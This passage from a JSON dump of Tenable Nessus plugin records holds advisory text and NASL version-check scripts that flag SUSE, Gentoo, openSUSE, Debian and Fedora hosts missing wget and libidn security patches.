HTTP\n request: Bad file descriptor (bsc#958342)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-01-02T00:00:00", "id": "SUSE_SU-2016-2226-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93369", "published": "2016-09-08T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : wget (SUSE-SU-2016:2226-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2226-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93369);\n script_version(\"2.7\");\n script_cvs_date(\"Date: 2019/09/11 11:22:13\");\n\n script_cve_id(\"CVE-2015-2059\", \"CVE-2016-4971\");\n script_bugtraq_id(72736);\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : wget (SUSE-SU-2016:2226-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion\n vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096,\n CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP\n request: Bad file descriptor (bsc#958342)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=984060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2059/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4971/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162226-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0ac3f58d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2016-1309=1\n\nSUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP1-2016-1309=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:wget-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"wget-1.14-10.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"wget-debuginfo-1.14-10.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"wget-debugsource-1.14-10.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"wget-1.14-10.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"wget-debuginfo-1.14-10.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"wget-debugsource-1.14-10.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T07:48:31", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201610-11\n(GNU Wget: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Wget. Please review the\n CVE identifier and bug reports referenced for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process or obtain sensitive information.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2020-01-02T00:00:00", "id": "GENTOO_GLSA-201610-11.NASL", "href": "https://www.tenable.com/plugins/nessus/94422", "published": "2016-10-31T00:00:00", "title": "GLSA-201610-11 : GNU Wget: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201610-11.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94422);\n script_version(\"2.2\");\n script_cvs_date(\"Date: 2019/04/11 17:23:06\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"GLSA\", value:\"201610-11\");\n\n script_name(english:\"GLSA-201610-11 : GNU Wget: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201610-11\n(GNU Wget: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Wget. Please review the\n CVE identifier and bug reports referenced for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process or obtain sensitive information.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201610-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All GNU Wget users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/wget-1.18'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/wget\", unaffected:make_list(\"ge 1.18\"), vulnerable:make_list(\"lt 1.18\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GNU Wget\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-01-01T00:27:26", "bulletinFamily": "scanner", "description": "libidn was updated to version 1.31 to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-2059: Out-of-bounds read with stringprep on\n invalid UTF-8 (bsc#923241).", "modified": "2020-01-02T00:00:00", "id": "OPENSUSE-2015-497.NASL", "href": "https://www.tenable.com/plugins/nessus/84866", "published": "2015-07-20T00:00:00", "title": "openSUSE Security Update : libidn (openSUSE-2015-497)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-497.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84866);\n script_version(\"$Revision: 2.2 $\");\n script_cvs_date(\"$Date: 2015/08/13 13:44:24 $\");\n\n script_cve_id(\"CVE-2015-2059\");\n\n script_name(english:\"openSUSE Security Update : libidn (openSUSE-2015-497)\");\n script_summary(english:\"Check for the openSUSE-2015-497 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libidn was updated to version 1.31 to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-2059: Out-of-bounds read with stringprep on\n invalid UTF-8 (bsc#923241).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=923241\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libidn packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libidn-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libidn-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libidn-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libidn-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libidn11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libidn11-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libidn11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libidn11-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libidn-debugsource-1.31-7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libidn-devel-1.31-7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libidn-tools-1.31-7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libidn-tools-debuginfo-1.31-7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libidn11-1.31-7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libidn11-debuginfo-1.31-7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libidn11-32bit-1.31-7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libidn11-debuginfo-32bit-1.31-7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libidn-debugsource-1.31-3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libidn-devel-1.31-3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libidn-tools-1.31-3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libidn-tools-debuginfo-1.31-3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libidn11-1.31-3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libidn11-debuginfo-1.31-3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libidn11-32bit-1.31-3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libidn11-debuginfo-32bit-1.31-3.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libidn-debugsource / libidn-devel / libidn-tools / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T06:51:07", "bulletinFamily": "scanner", "description": "It was discovered that libidn, the GNU library for Internationalized\nDomain Names (IDNs), did not correctly handle invalid UTF-8 input,\ncausing an out-of-bounds read. This could allow attackers to disclose\nsensitive information from an application using the libidn library.\n\nFor Debian 7 ", "modified": "2020-01-02T00:00:00", "id": "DEBIAN_DLA-476.NASL", "href": "https://www.tenable.com/plugins/nessus/91196", "published": "2016-05-18T00:00:00", "title": "Debian DLA-476-1 : libidn security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-476-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91196);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2018/07/06 11:26:06\");\n\n script_cve_id(\"CVE-2015-2059\");\n script_bugtraq_id(72736);\n\n script_name(english:\"Debian DLA-476-1 : libidn security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that libidn, the GNU library for Internationalized\nDomain Names (IDNs), did not correctly handle invalid UTF-8 input,\ncausing an out-of-bounds read. This could allow attackers to disclose\nsensitive information from an application using the libidn library.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.25-2+deb7u1.\n\nWe recommend that you upgrade your libidn packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/05/msg00029.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/libidn\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:idn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libidn11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libidn11-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libidn11-java\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"idn\", reference:\"1.25-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libidn11\", reference:\"1.25-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libidn11-dev\", reference:\"1.25-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libidn11-java\", reference:\"1.25-2+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T06:50:59", "bulletinFamily": "scanner", "description": "Adam Sampson found a vulnerability in GNU Libidn, library that\nimplements the IETF IDN specifications. Libdin incorrectly handled\ninvalid UTF-8 input, causing it to bad free(). This issue was\nintroduced by the fix for CVE-2015-2059.\n\nFor Debian 6 ", "modified": "2020-01-02T00:00:00", "id": "DEBIAN_DLA-291.NASL", "href": "https://www.tenable.com/plugins/nessus/85418", "published": "2015-08-17T00:00:00", "title": "Debian DLA-291-1 : libidn security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-291-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85418);\n script_version(\"$Revision: 2.2 $\");\n script_cvs_date(\"$Date: 2015/12/02 20:08:17 $\");\n\n script_name(english:\"Debian DLA-291-1 : libidn security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adam Sampson found a vulnerability in GNU Libidn, library that\nimplements the IETF IDN specifications. Libdin incorrectly handled\ninvalid UTF-8 input, causing it to bad free(). This issue was\nintroduced by the fix for CVE-2015-2059.\n\nFor Debian 6 'Squeeze', this issue has been fixed in the\n1.15-2+deb6u2 version of libidn.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/08/msg00005.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/libidn\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:idn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libidn11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libidn11-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libidn11-java\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"idn\", reference:\"1.15-2+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libidn11\", reference:\"1.15-2+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libidn11-dev\", reference:\"1.15-2+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libidn11-java\", reference:\"1.15-2+deb6u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T07:07:28", "bulletinFamily": "scanner", "description": "Security fix for CVE-2015-2059\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-01-02T00:00:00", "id": "FEDORA_2015-11621.NASL", "href": "https://www.tenable.com/plugins/nessus/85062", "published": "2015-07-29T00:00:00", "title": "Fedora 21 : libidn-1.31-1.fc21 (2015-11621)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-11621.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85062);\n script_version(\"$Revision: 2.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:49:05 $\");\n\n script_cve_id(\"CVE-2015-2059\");\n script_xref(name:\"FEDORA\", value:\"2015-11621\");\n\n script_name(english:\"Fedora 21 : libidn-1.31-1.fc21 (2015-11621)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2015-2059\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1197796\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-July/162537.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6d531edd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libidn package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libidn\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n 